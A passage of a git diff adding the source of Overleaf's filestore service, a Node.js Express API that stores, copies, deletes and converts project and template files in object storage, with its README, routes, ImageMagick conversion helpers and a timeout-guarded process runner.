us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/filestore/README.md b/services/filestore/README.md new file mode 100644 index 0000000..921fb4b --- /dev/null +++ b/services/filestore/README.md @@ -0,0 +1,22 @@ +overleaf/filestore +==================== + +An API for CRUD operations on binary files stored in S3 + +filestore acts as a proxy between the CLSIs and (currently) Amazon S3 storage, presenting a RESTful HTTP interface to the CLSIs on port 3009 by default. Urls are mapped to node functions in https://github.com/overleaf/filestore/blob/master/app.coffee . 
URLs are of the form: + +* `/project/:project_id/file/:file_id` +* `/template/:template_id/v/:version/:format` +* `/project/:project_id/public/:public_file_id` +* `/project/:project_id/size` +* `/bucket/:bucket/key/*` +* `/shutdown` +* `/status` - returns HTTP 200 `filestore is up` or HTTP 503 when shutting down +* `/health_check` + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2014-2019. diff --git a/services/filestore/app.js b/services/filestore/app.js new file mode 100644 index 0000000..24741e0 --- /dev/null +++ b/services/filestore/app.js @@ -0,0 +1,189 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const Events = require('node:events') +const Metrics = require('@overleaf/metrics') + +const logger = require('@overleaf/logger') +logger.initialize(process.env.METRICS_APP_NAME || 'filestore') + +const settings = require('@overleaf/settings') +const express = require('express') +const bodyParser = require('body-parser') + +const fileController = require('./app/js/FileController') +const keyBuilder = require('./app/js/KeyBuilder') +const healthCheckController = require('./app/js/HealthCheckController') + +const RequestLogger = require('./app/js/RequestLogger') + +Events.setMaxListeners(20) + +const app = express() + +app.use(RequestLogger.middleware) + +Metrics.open_sockets.monitor(true) +Metrics.memory.monitor(logger) +if (Metrics.event_loop) { + Metrics.event_loop.monitor(logger) +} +Metrics.leaked_sockets.monitor(logger) + +app.use(function (req, res, next) { + Metrics.inc('http-request') + next() +}) + +// Handle requests that come in after we've started shutting down +app.use((req, res, next) => { + if (settings.shuttingDown) { + logger.warn( + { req, timeSinceShutdown: Date.now() - settings.shutDownTime }, + 'request received after shutting down' + ) + // We don't want keep-alive connections to be kept open when the server is shutting down. 
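+    // 'Connection: close' is advisory; handleShutdownSignal below also
+    // calls server.closeIdleConnections() to reap sockets that ignore it.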
+ res.set('Connection', 'close') + } + next() +}) + +Metrics.injectMetricsRoute(app) + +if (settings.filestore.stores.user_files) { + app.head( + '/project/:project_id/file/:file_id', + keyBuilder.userFileKeyMiddleware, + fileController.getFileHead + ) + app.get( + '/project/:project_id/file/:file_id', + keyBuilder.userFileKeyMiddleware, + fileController.getFile + ) + app.post( + '/project/:project_id/file/:file_id', + keyBuilder.userFileKeyMiddleware, + fileController.insertFile + ) + app.put( + '/project/:project_id/file/:file_id', + keyBuilder.userFileKeyMiddleware, + bodyParser.json(), + fileController.copyFile + ) + app.delete( + '/project/:project_id/file/:file_id', + keyBuilder.userFileKeyMiddleware, + fileController.deleteFile + ) + app.delete( + '/project/:project_id', + keyBuilder.userProjectKeyMiddleware, + fileController.deleteProject + ) + + app.get( + '/project/:project_id/size', + keyBuilder.userProjectKeyMiddleware, + fileController.directorySize + ) +} + +if (settings.filestore.stores.template_files) { + app.head( + '/template/:template_id/v/:version/:format', + keyBuilder.templateFileKeyMiddleware, + fileController.getFileHead + ) + app.get( + '/template/:template_id/v/:version/:format', + keyBuilder.templateFileKeyMiddleware, + fileController.getFile + ) + app.get( + '/template/:template_id/v/:version/:format/:sub_type', + keyBuilder.templateFileKeyMiddleware, + fileController.getFile + ) + app.post( + '/template/:template_id/v/:version/:format', + keyBuilder.templateFileKeyMiddleware, + fileController.insertFile + ) +} + +app.get( + '/bucket/:bucket/key/*', + keyBuilder.bucketFileKeyMiddleware, + fileController.getFile +) + +app.get('/status', function (req, res) { + if (settings.shuttingDown) { + res.sendStatus(503) // Service unavailable + } else { + res.send('filestore is up') + } +}) + +app.get('/health_check', healthCheckController.check) + +app.use(RequestLogger.errorHandler) + +const port = settings.internal.filestore.port || 3009 +const host = settings.internal.filestore.host || '0.0.0.0' + +let server = null +if (!module.parent) { + // Called directly + server = app.listen(port, host, error => { + if (error) { + logger.error({ err: error }, 'Error starting Filestore') + throw error + } + logger.debug(`Filestore starting up, listening on ${host}:${port}`) + }) +} + +process + .on('unhandledRejection', (reason, p) => { + logger.err(reason, 'Unhandled Rejection at Promise', p) + }) + .on('uncaughtException', err => { + logger.err(err, 'Uncaught Exception thrown') + process.exit(1) + }) + +function handleShutdownSignal(signal) { + logger.info({ signal }, 'received interrupt, cleaning up') + if (settings.shuttingDown) { + logger.warn({ signal }, 'already shutting down, ignoring interrupt') + return + } + settings.shuttingDown = true + settings.shutDownTime = Date.now() + // stop accepting new connections, the callback is called when existing connections have finished + server.close(() => { + logger.info({ signal }, 'server closed') + // exit after a short delay so logs can be flushed + setTimeout(() => { + process.exit() + }, 100) + }) + // close idle http keep-alive connections + server.closeIdleConnections() + setTimeout(() => { + logger.info({ signal }, 'shutdown timed out, exiting') + // close all connections immediately + server.closeAllConnections() + // exit after a short delay to allow for cleanup + setTimeout(() => { + process.exit() + }, 100) + }, settings.gracefulShutdownDelayInMs) +} + +process.on('SIGTERM', handleShutdownSignal) + +module.exports = app 
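For illustration, a minimal client sketch against the routes registered above. It is not part of the commit: it assumes a local instance with the user_files store configured, FILESTORE_URL and the 24-character hex ids are made-up placeholders (the ids are shaped to satisfy the key validation regex in FileHandler), and Node 20's built-in fetch keeps it dependency-free.

const BASE = process.env.FILESTORE_URL || 'http://127.0.0.1:3009'
// Hypothetical 24-character hex ids, matching the key validation regex
const projectId = 'aaaaaaaaaaaaaaaaaaaaaaaa'
const fileId = 'bbbbbbbbbbbbbbbbbbbbbbbb'
const fileUrl = `${BASE}/project/${projectId}/file/${fileId}`

async function main() {
  // POST pipes the raw request body straight into the persistor; 200 on success
  let res = await fetch(fileUrl, { method: 'POST', body: 'hello filestore' })
  console.log('insert:', res.status)

  // HEAD reports the stored size via Content-Length, without sending a body
  res = await fetch(fileUrl, { method: 'HEAD' })
  console.log('size:', res.headers.get('content-length'))

  // GET streams the contents back (404 when the key does not exist)
  res = await fetch(fileUrl)
  console.log('contents:', await res.text())

  // The project size endpoint returns JSON shaped { 'total bytes': <n> }
  res = await fetch(`${BASE}/project/${projectId}/size`)
  console.log('project size:', await res.json())

  // DELETE answers 204 with no body
  res = await fetch(fileUrl, { method: 'DELETE' })
  console.log('delete:', res.status)
}

main().catch(err => {
  console.error(err)
  process.exit(1)
})

Note that with ALLOW_REDIRECTS=true the GET may answer with a redirect to a signed URL instead of the bytes; fetch follows it transparently, which is why the sketch never special-cases a 302.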
diff --git a/services/filestore/app/js/Errors.js b/services/filestore/app/js/Errors.js new file mode 100644 index 0000000..c7d19d8 --- /dev/null +++ b/services/filestore/app/js/Errors.js @@ -0,0 +1,30 @@ +const OError = require('@overleaf/o-error') +const { Errors } = require('@overleaf/object-persistor') + +class HealthCheckError extends OError {} +class ConversionsDisabledError extends OError {} +class ConversionError extends OError {} +class TimeoutError extends OError {} +class InvalidParametersError extends OError {} + +class FailedCommandError extends OError { + constructor(command, code, stdout, stderr) { + super('command failed with error exit code', { + command, + code, + }) + this.stdout = stdout + this.stderr = stderr + this.code = code + } +} + +module.exports = { + FailedCommandError, + ConversionsDisabledError, + ConversionError, + HealthCheckError, + TimeoutError, + InvalidParametersError, + ...Errors, +} diff --git a/services/filestore/app/js/FileController.js b/services/filestore/app/js/FileController.js new file mode 100644 index 0000000..127bbcc --- /dev/null +++ b/services/filestore/app/js/FileController.js @@ -0,0 +1,214 @@ +const FileHandler = require('./FileHandler') +const metrics = require('@overleaf/metrics') +const parseRange = require('range-parser') +const Errors = require('./Errors') +const { pipeline } = require('node:stream') + +const maxSizeInBytes = 1024 * 1024 * 1024 // 1GB + +module.exports = { + getFile, + getFileHead, + insertFile, + copyFile, + deleteFile, + deleteProject, + directorySize, +} + +function getFile(req, res, next) { + const { key, bucket } = req + const { format, style } = req.query + const options = { + key, + bucket, + format, + style, + } + + metrics.inc('getFile') + req.requestLogger.setMessage('getting file') + req.requestLogger.addFields({ + key, + bucket, + format, + style, + cacheWarm: req.query.cacheWarm, + }) + + if (req.headers.range) { + const range = _getRange(req.headers.range) + if (range) { + options.start = range.start + options.end = range.end + req.requestLogger.addFields({ range }) + } + } + + FileHandler.getRedirectUrl(bucket, key, options, function (err, redirectUrl) { + if (err) { + metrics.inc('file_redirect_error') + } + + if (redirectUrl) { + metrics.inc('file_redirect') + return res.redirect(redirectUrl) + } + + FileHandler.getFile(bucket, key, options, function (err, fileStream) { + if (err) { + if (err instanceof Errors.NotFoundError) { + res.sendStatus(404) + } else { + next(err) + } + return + } + + if (req.query.cacheWarm) { + fileStream.destroy() + return res.sendStatus(200).end() + } + + pipeline(fileStream, res, err => { + if (err && err.code === 'ERR_STREAM_PREMATURE_CLOSE') { + res.end() + } else if (err) { + next( + new Errors.ReadError( + 'error transferring stream', + { bucket, key, format, style }, + err + ) + ) + } + }) + }) + }) +} + +function getFileHead(req, res, next) { + const { key, bucket } = req + + metrics.inc('getFileSize') + req.requestLogger.setMessage('getting file size') + req.requestLogger.addFields({ key, bucket }) + + FileHandler.getFileSize(bucket, key, function (err, fileSize) { + if (err) { + if (err instanceof Errors.NotFoundError) { + res.sendStatus(404) + } else { + next(err) + } + return + } + res.set('Content-Length', fileSize) + res.status(200).end() + }) +} + +function insertFile(req, res, next) { + metrics.inc('insertFile') + const { key, bucket } = req + + req.requestLogger.setMessage('inserting file') + req.requestLogger.addFields({ key, bucket }) + + 
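+  // The request object itself is the readable stream: the raw body is
+  // piped through to the persistor without being buffered in memory.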
+  FileHandler.insertFile(bucket, key, req, function (err) {
+    if (err) {
+      next(err)
+    } else {
+      res.sendStatus(200)
+    }
+  })
+}
+
+function copyFile(req, res, next) {
+  metrics.inc('copyFile')
+  const { key, bucket } = req
+  const oldProjectId = req.body.source.project_id
+  const oldFileId = req.body.source.file_id
+
+  req.requestLogger.addFields({
+    key,
+    bucket,
+    oldProject_id: oldProjectId,
+    oldFile_id: oldFileId,
+  })
+  req.requestLogger.setMessage('copying file')
+
+  FileHandler.copyObject(bucket, `${oldProjectId}/${oldFileId}`, key, err => {
+    if (err) {
+      if (err instanceof Errors.NotFoundError) {
+        res.sendStatus(404)
+      } else {
+        next(err)
+      }
+    } else {
+      res.sendStatus(200)
+    }
+  })
+}
+
+function deleteFile(req, res, next) {
+  metrics.inc('deleteFile')
+  const { key, bucket } = req
+
+  req.requestLogger.addFields({ key, bucket })
+  req.requestLogger.setMessage('deleting file')
+
+  FileHandler.deleteFile(bucket, key, function (err) {
+    if (err) {
+      next(err)
+    } else {
+      res.sendStatus(204)
+    }
+  })
+}
+
+function deleteProject(req, res, next) {
+  metrics.inc('deleteProject')
+  const { key, bucket } = req
+
+  req.requestLogger.setMessage('deleting project')
+  req.requestLogger.addFields({ key, bucket })
+
+  FileHandler.deleteProject(bucket, key, function (err) {
+    if (err) {
+      if (err instanceof Errors.InvalidParametersError) {
+        return res.sendStatus(400)
+      }
+      next(err)
+    } else {
+      res.sendStatus(204)
+    }
+  })
+}
+
+function directorySize(req, res, next) {
+  metrics.inc('projectSize')
+  const { project_id: projectId, bucket } = req
+
+  req.requestLogger.setMessage('getting project size')
+  req.requestLogger.addFields({ projectId, bucket })
+
+  FileHandler.getDirectorySize(bucket, projectId, function (err, size) {
+    if (err) {
+      return next(err)
+    }
+
+    res.json({ 'total bytes': size })
+    req.requestLogger.addFields({ size })
+  })
+}
+
+function _getRange(header) {
+  const parsed = parseRange(maxSizeInBytes, header)
+  if (parsed === -1 || parsed === -2 || parsed.type !== 'bytes') {
+    return null
+  } else {
+    const range = parsed[0]
+    return { start: range.start, end: range.end }
+  }
+}
diff --git a/services/filestore/app/js/FileConverter.js b/services/filestore/app/js/FileConverter.js
new file mode 100644
index 0000000..ac3dcce
--- /dev/null
+++ b/services/filestore/app/js/FileConverter.js
@@ -0,0 +1,98 @@
+const metrics = require('@overleaf/metrics')
+const Settings = require('@overleaf/settings')
+const { callbackify } = require('node:util')
+
+const safeExec = require('./SafeExec').promises
+const { ConversionError } = require('./Errors')
+
+const APPROVED_FORMATS = ['png']
+const FOURTY_SECONDS = 40 * 1000
+const KILL_SIGNAL = 'SIGTERM'
+
+module.exports = {
+  convert: callbackify(convert),
+  thumbnail: callbackify(thumbnail),
+  preview: callbackify(preview),
+  promises: {
+    convert,
+    thumbnail,
+    preview,
+  },
+}
+
+async function convert(sourcePath, requestedFormat) {
+  const width = '600x'
+  return await _convert(sourcePath, requestedFormat, [
+    'convert',
+    '-define',
+    `pdf:fit-page=${width}`,
+    '-flatten',
+    '-density',
+    '300',
+    `${sourcePath}[0]`,
+  ])
+}
+
+async function thumbnail(sourcePath) {
+  const width = '260x'
+  return await _convert(sourcePath, 'png', [
+    'convert',
+    '-flatten',
+    '-background',
+    'white',
+    '-density',
+    '300',
+    '-define',
+    `pdf:fit-page=${width}`,
+    `${sourcePath}[0]`,
+    '-resize',
+    width,
+  ])
+}
+
+async function preview(sourcePath) {
+  const width = '548x'
+  return await _convert(sourcePath, 'png', [
+    'convert',
+    '-flatten',
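+    // remaining flags mirror thumbnail() above; only the target width differs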
+ '-background', + 'white', + '-density', + '300', + '-define', + `pdf:fit-page=${width}`, + `${sourcePath}[0]`, + '-resize', + width, + ]) +} + +async function _convert(sourcePath, requestedFormat, command) { + if (!APPROVED_FORMATS.includes(requestedFormat)) { + throw new ConversionError('invalid format requested', { + format: requestedFormat, + }) + } + + const timer = new metrics.Timer('imageConvert') + const destPath = `${sourcePath}.${requestedFormat}` + + command.push(destPath) + command = Settings.commands.convertCommandPrefix.concat(command) + + try { + await safeExec(command, { + killSignal: KILL_SIGNAL, + timeout: FOURTY_SECONDS, + }) + } catch (err) { + throw new ConversionError( + 'something went wrong converting file', + { stderr: err.stderr, sourcePath, requestedFormat, destPath }, + err + ) + } + + timer.done() + return destPath +} diff --git a/services/filestore/app/js/FileHandler.js b/services/filestore/app/js/FileHandler.js new file mode 100644 index 0000000..2ed28bd --- /dev/null +++ b/services/filestore/app/js/FileHandler.js @@ -0,0 +1,228 @@ +const Settings = require('@overleaf/settings') +const { callbackify } = require('node:util') +const fs = require('node:fs') +let PersistorManager = require('./PersistorManager') +const LocalFileWriter = require('./LocalFileWriter') +const FileConverter = require('./FileConverter') +const KeyBuilder = require('./KeyBuilder') +const ImageOptimiser = require('./ImageOptimiser') +const { ConversionError, InvalidParametersError } = require('./Errors') +const metrics = require('@overleaf/metrics') + +module.exports = { + copyObject: callbackify(copyObject), + insertFile: callbackify(insertFile), + deleteFile: callbackify(deleteFile), + deleteProject: callbackify(deleteProject), + getFile: callbackify(getFile), + getRedirectUrl: callbackify(getRedirectUrl), + getFileSize: callbackify(getFileSize), + getDirectorySize: callbackify(getDirectorySize), + promises: { + copyObject, + getFile, + getRedirectUrl, + insertFile, + deleteFile, + deleteProject, + getFileSize, + getDirectorySize, + }, +} + +if (process.env.NODE_ENV === 'test') { + module.exports._TESTONLYSwapPersistorManager = _PersistorManager => { + PersistorManager = _PersistorManager + } +} + +async function copyObject(bucket, sourceKey, destinationKey) { + await PersistorManager.copyObject(bucket, sourceKey, destinationKey) +} + +async function insertFile(bucket, key, stream) { + const convertedKey = KeyBuilder.getConvertedFolderKey(key) + if (!convertedKey.match(/^[0-9a-f]{24}\/([0-9a-f]{24}|v\/[0-9]+\/[a-z]+)/i)) { + throw new InvalidParametersError('key does not match validation regex', { + bucket, + key, + convertedKey, + }) + } + await PersistorManager.sendStream(bucket, key, stream) +} + +async function deleteFile(bucket, key) { + const convertedKey = KeyBuilder.getConvertedFolderKey(key) + if (!convertedKey.match(/^[0-9a-f]{24}\/([0-9a-f]{24}|v\/[0-9]+\/[a-z]+)/i)) { + throw new InvalidParametersError('key does not match validation regex', { + bucket, + key, + convertedKey, + }) + } + const jobs = [PersistorManager.deleteObject(bucket, key)] + if ( + Settings.enableConversions && + bucket === Settings.filestore.stores.template_files + ) { + jobs.push(PersistorManager.deleteDirectory(bucket, convertedKey)) + } + await Promise.all(jobs) +} + +async function deleteProject(bucket, key) { + if (!key.match(/^[0-9a-f]{24}\//i)) { + throw new InvalidParametersError('key does not match validation regex', { + bucket, + key, + }) + } + await PersistorManager.deleteDirectory(bucket, 
key) +} + +async function getFile(bucket, key, opts) { + opts = opts || {} + if (!opts.format && !opts.style) { + return await PersistorManager.getObjectStream(bucket, key, opts) + } else { + return await _getConvertedFile(bucket, key, opts) + } +} + +let ACTIVE_SIGNED_URL_CALLS = 0 + +async function getRedirectUrl(bucket, key, opts) { + // if we're doing anything unusual with options, or the request isn't for + // one of the default buckets, return null so that we proxy the file + opts = opts || {} + if ( + !opts.start && + !opts.end && + !opts.format && + !opts.style && + Object.values(Settings.filestore.stores).includes(bucket) && + Settings.filestore.allowRedirects + ) { + // record the number of in-flight calls to generate signed URLs + metrics.gauge('active_signed_url_calls', ++ACTIVE_SIGNED_URL_CALLS, { + path: bucket, + }) + try { + const timer = new metrics.Timer('signed_url_call_time', { + path: bucket, + }) + const redirectUrl = await PersistorManager.getRedirectUrl(bucket, key) + timer.done() + return redirectUrl + } finally { + metrics.gauge('active_signed_url_calls', --ACTIVE_SIGNED_URL_CALLS, { + path: bucket, + }) + } + } + + return null +} + +async function getFileSize(bucket, key) { + return await PersistorManager.getObjectSize(bucket, key) +} + +async function getDirectorySize(bucket, projectId) { + return await PersistorManager.directorySize(bucket, projectId) +} + +async function _getConvertedFile(bucket, key, opts) { + const convertedKey = KeyBuilder.addCachingToKey(key, opts) + const exists = await PersistorManager.checkIfObjectExists( + bucket, + convertedKey + ) + if (exists) { + return await PersistorManager.getObjectStream(bucket, convertedKey, opts) + } else { + return await _getConvertedFileAndCache(bucket, key, convertedKey, opts) + } +} + +async function _getConvertedFileAndCache(bucket, key, convertedKey, opts) { + let convertedFsPath + try { + convertedFsPath = await _convertFile(bucket, key, opts) + await ImageOptimiser.promises.compressPng(convertedFsPath) + await PersistorManager.sendFile(bucket, convertedKey, convertedFsPath) + } catch (err) { + LocalFileWriter.deleteFile(convertedFsPath, () => {}) + throw new ConversionError( + 'failed to convert file', + { opts, bucket, key, convertedKey }, + err + ) + } + // Send back the converted file from the local copy to avoid problems + // with the file not being present in S3 yet. As described in the + // documentation below, we have already made a 'HEAD' request in + // checkIfFileExists so we only have "eventual consistency" if we try + // to stream it from S3 here. This was a cause of many 403 errors. + // + // "Amazon S3 provides read-after-write consistency for PUTS of new + // objects in your S3 bucket in all regions with one caveat. 
The + // caveat is that if you make a HEAD or GET request to the key name + // (to find if the object exists) before creating the object, Amazon + // S3 provides eventual consistency for read-after-write."" + // https://docs.aws.amazon.com/AmazonS3/latest/dev/Introduction.html#ConsistencyModel + const readStream = fs.createReadStream(convertedFsPath) + readStream.on('error', function () { + LocalFileWriter.deleteFile(convertedFsPath, function () {}) + }) + readStream.on('end', function () { + LocalFileWriter.deleteFile(convertedFsPath, function () {}) + }) + return readStream +} + +async function _convertFile(bucket, originalKey, opts) { + let originalFsPath + try { + originalFsPath = await _writeFileToDisk(bucket, originalKey, opts) + } catch (err) { + throw new ConversionError( + 'unable to write file to disk', + { bucket, originalKey, opts }, + err + ) + } + + let promise + if (opts.format) { + promise = FileConverter.promises.convert(originalFsPath, opts.format) + } else if (opts.style === 'thumbnail') { + promise = FileConverter.promises.thumbnail(originalFsPath) + } else if (opts.style === 'preview') { + promise = FileConverter.promises.preview(originalFsPath) + } else { + throw new ConversionError('invalid file conversion options', { + bucket, + originalKey, + opts, + }) + } + let destPath + try { + destPath = await promise + } catch (err) { + throw new ConversionError( + 'error converting file', + { bucket, originalKey, opts }, + err + ) + } + LocalFileWriter.deleteFile(originalFsPath, function () {}) + return destPath +} + +async function _writeFileToDisk(bucket, key, opts) { + const fileStream = await PersistorManager.getObjectStream(bucket, key, opts) + return await LocalFileWriter.promises.writeStream(fileStream, key) +} diff --git a/services/filestore/app/js/HealthCheckController.js b/services/filestore/app/js/HealthCheckController.js new file mode 100644 index 0000000..e9b739a --- /dev/null +++ b/services/filestore/app/js/HealthCheckController.js @@ -0,0 +1,67 @@ +const fs = require('node:fs') +const path = require('node:path') +const Settings = require('@overleaf/settings') +const { WritableBuffer } = require('@overleaf/stream-utils') +const { promisify } = require('node:util') +const Stream = require('node:stream') + +const pipeline = promisify(Stream.pipeline) +const fsCopy = promisify(fs.copyFile) +const fsUnlink = promisify(fs.unlink) + +const { HealthCheckError } = require('./Errors') +const FileConverter = require('./FileConverter').promises +const FileHandler = require('./FileHandler').promises + +async function checkCanGetFiles() { + if (!Settings.health_check) { + return + } + + const projectId = Settings.health_check.project_id + const fileId = Settings.health_check.file_id + const key = `${projectId}/${fileId}` + const bucket = Settings.filestore.stores.user_files + + const buffer = new WritableBuffer({ initialSize: 100 }) + + const sourceStream = await FileHandler.getFile(bucket, key, {}) + try { + await pipeline(sourceStream, buffer) + } catch (err) { + throw new HealthCheckError('failed to get health-check file', {}, err) + } + + if (!buffer.size()) { + throw new HealthCheckError('no bytes written to download stream') + } +} + +async function checkFileConvert() { + if (!Settings.enableConversions) { + return + } + + const imgPath = path.join(Settings.path.uploadFolder, '/tiny.pdf') + + let resultPath + try { + await fsCopy('./tiny.pdf', imgPath) + resultPath = await FileConverter.thumbnail(imgPath) + } finally { + if (resultPath) { + await fsUnlink(resultPath) 
+ } + await fsUnlink(imgPath) + } +} + +module.exports = { + check(req, res, next) { + Promise.all([checkCanGetFiles(), checkFileConvert()]) + .then(() => res.sendStatus(200)) + .catch(err => { + next(err) + }) + }, +} diff --git a/services/filestore/app/js/ImageOptimiser.js b/services/filestore/app/js/ImageOptimiser.js new file mode 100644 index 0000000..6ed29e1 --- /dev/null +++ b/services/filestore/app/js/ImageOptimiser.js @@ -0,0 +1,34 @@ +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const { callbackify } = require('node:util') +const safeExec = require('./SafeExec').promises + +module.exports = { + compressPng: callbackify(compressPng), + promises: { + compressPng, + }, +} + +async function compressPng(localPath, callback) { + const timer = new metrics.Timer('compressPng') + const args = ['optipng', localPath] + const opts = { + timeout: 30 * 1000, + killSignal: 'SIGKILL', + } + + try { + await safeExec(args, opts) + timer.done() + } catch (err) { + if (err.code === 'SIGKILL') { + logger.warn( + { err, stderr: err.stderr, localPath }, + 'optimiser timeout reached' + ) + } else { + throw err + } + } +} diff --git a/services/filestore/app/js/KeyBuilder.js b/services/filestore/app/js/KeyBuilder.js new file mode 100644 index 0000000..f67a0e8 --- /dev/null +++ b/services/filestore/app/js/KeyBuilder.js @@ -0,0 +1,71 @@ +const settings = require('@overleaf/settings') + +module.exports = { + getConvertedFolderKey, + addCachingToKey, + userFileKeyMiddleware, + userProjectKeyMiddleware, + bucketFileKeyMiddleware, + templateFileKeyMiddleware, +} + +function getConvertedFolderKey(key) { + return `${key}-converted-cache/` +} + +function addCachingToKey(key, opts) { + key = this.getConvertedFolderKey(key) + + if (opts.format && !opts.style) { + key = `${key}format-${opts.format}` + } + if (opts.style && !opts.format) { + key = `${key}style-${opts.style}` + } + if (opts.style && opts.format) { + key = `${key}format-${opts.format}-style-${opts.style}` + } + + return key +} + +function userFileKeyMiddleware(req, res, next) { + const { project_id: projectId, file_id: fileId } = req.params + req.key = `${projectId}/${fileId}` + req.bucket = settings.filestore.stores.user_files + next() +} + +function userProjectKeyMiddleware(req, res, next) { + const { project_id: projectId } = req.params + req.project_id = projectId + req.key = `${projectId}/` + req.bucket = settings.filestore.stores.user_files + next() +} + +function bucketFileKeyMiddleware(req, res, next) { + req.bucket = req.params.bucket + req.key = req.params[0] + next() +} + +function templateFileKeyMiddleware(req, res, next) { + const { + template_id: templateId, + format, + version, + sub_type: subType, + } = req.params + + req.key = `${templateId}/v/${version}/${format}` + + if (subType) { + req.key = `${req.key}/${subType}` + } + + req.bucket = settings.filestore.stores.template_files + req.version = version + + next() +} diff --git a/services/filestore/app/js/LocalFileWriter.js b/services/filestore/app/js/LocalFileWriter.js new file mode 100644 index 0000000..fe55bdc --- /dev/null +++ b/services/filestore/app/js/LocalFileWriter.js @@ -0,0 +1,56 @@ +const fs = require('node:fs') +const crypto = require('node:crypto') +const path = require('node:path') +const Stream = require('node:stream') +const { callbackify, promisify } = require('node:util') +const metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { WriteError } = require('./Errors') + +module.exports 
= { + promises: { + writeStream, + deleteFile, + }, + writeStream: callbackify(writeStream), + deleteFile: callbackify(deleteFile), +} + +const pipeline = promisify(Stream.pipeline) + +async function writeStream(stream, key) { + const timer = new metrics.Timer('writingFile') + const fsPath = _getPath(key) + + const writeStream = fs.createWriteStream(fsPath) + try { + await pipeline(stream, writeStream) + timer.done() + return fsPath + } catch (err) { + await deleteFile(fsPath) + + throw new WriteError('problem writing file locally', { fsPath }, err) + } +} + +async function deleteFile(fsPath) { + if (!fsPath) { + return + } + try { + await promisify(fs.unlink)(fsPath) + } catch (err) { + if (err.code !== 'ENOENT') { + throw new WriteError('failed to delete file', { fsPath }, err) + } + } +} + +function _getPath(key) { + if (key == null) { + key = crypto.randomUUID() + } + key = key.replace(/\//g, '-') + return path.join(Settings.path.uploadFolder, key) +} diff --git a/services/filestore/app/js/PersistorManager.js b/services/filestore/app/js/PersistorManager.js new file mode 100644 index 0000000..c6442d2 --- /dev/null +++ b/services/filestore/app/js/PersistorManager.js @@ -0,0 +1,9 @@ +const settings = require('@overleaf/settings') + +const persistorSettings = settings.filestore +persistorSettings.paths = settings.path + +const ObjectPersistor = require('@overleaf/object-persistor') +const persistor = ObjectPersistor(persistorSettings) + +module.exports = persistor diff --git a/services/filestore/app/js/RequestLogger.js b/services/filestore/app/js/RequestLogger.js new file mode 100644 index 0000000..1fde404 --- /dev/null +++ b/services/filestore/app/js/RequestLogger.js @@ -0,0 +1,61 @@ +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') + +class RequestLogger { + constructor() { + this._logInfo = {} + this._logMessage = 'http request' + } + + addFields(fields) { + Object.assign(this._logInfo, fields) + } + + setMessage(message) { + this._logMessage = message + } + + static errorHandler(err, req, res, next) { + req.requestLogger.addFields({ error: err }) + res.status(500).send(err.message) + } + + static middleware(req, res, next) { + const startTime = new Date() + req.requestLogger = new RequestLogger() + + // override the 'end' method to log and record metrics + const end = res.end + res.end = function () { + // apply the standard request 'end' method before logging and metrics + end.apply(this, arguments) + + const responseTime = new Date() - startTime + + const routePath = req.route && req.route.path.toString() + + if (routePath) { + metrics.timing('http_request', responseTime, null, { + method: req.method, + status_code: res.statusCode, + path: routePath.replace(/\//g, '_').replace(/:/g, '').slice(1), + }) + } + + const level = res.statusCode >= 500 ? 
'err' : 'debug' + logger[level]( + { + req, + res, + responseTimeMs: responseTime, + info: req.requestLogger._logInfo, + }, + req.requestLogger._logMessage + ) + } + + next() + } +} + +module.exports = RequestLogger diff --git a/services/filestore/app/js/SafeExec.js b/services/filestore/app/js/SafeExec.js new file mode 100644 index 0000000..16ebcf1 --- /dev/null +++ b/services/filestore/app/js/SafeExec.js @@ -0,0 +1,85 @@ +const lodashOnce = require('lodash.once') +const childProcess = require('node:child_process') +const Settings = require('@overleaf/settings') +const { ConversionsDisabledError, FailedCommandError } = require('./Errors') + +// execute a command in the same way as 'exec' but with a timeout that +// kills all child processes +// +// we spawn the command with 'detached:true' to make a new process +// group, then we can kill everything in that process group. + +module.exports = safeExec +module.exports.promises = safeExecPromise + +// options are {timeout: number-of-milliseconds, killSignal: signal-name} +function safeExec(command, options, callback) { + if (!Settings.enableConversions) { + return callback( + new ConversionsDisabledError('image conversions are disabled') + ) + } + + const [cmd, ...args] = command + + const child = childProcess.spawn(cmd, args, { detached: true }) + let stdout = '' + let stderr = '' + + let killTimer + + const cleanup = lodashOnce(function (err) { + if (killTimer) { + clearTimeout(killTimer) + } + callback(err, stdout, stderr) + }) + + if (options.timeout) { + killTimer = setTimeout(function () { + try { + // use negative process id to kill process group + process.kill(-child.pid, options.killSignal || 'SIGTERM') + } catch (error) { + cleanup( + new FailedCommandError('failed to kill process after timeout', { + command, + options, + pid: child.pid, + }) + ) + } + }, options.timeout) + } + + child.on('close', function (code, signal) { + if (code || signal) { + return cleanup( + new FailedCommandError(command, code || signal, stdout, stderr) + ) + } + + cleanup() + }) + + child.on('error', err => { + cleanup(err) + }) + child.stdout.on('data', chunk => { + stdout += chunk + }) + child.stderr.on('data', chunk => { + stderr += chunk + }) +} + +function safeExecPromise(command, options) { + return new Promise((resolve, reject) => { + safeExec(command, options, (err, stdout, stderr) => { + if (err) { + reject(err) + } + resolve({ stdout, stderr }) + }) + }) +} diff --git a/services/filestore/buildscript.txt b/services/filestore/buildscript.txt new file mode 100644 index 0000000..75a491c --- /dev/null +++ b/services/filestore/buildscript.txt @@ -0,0 +1,12 @@ +filestore +--data-dirs=uploads,user_files,template_files +--dependencies=s3,gcs +--docker-repos=us-east1-docker.pkg.dev/overleaf-ops/ol-docker 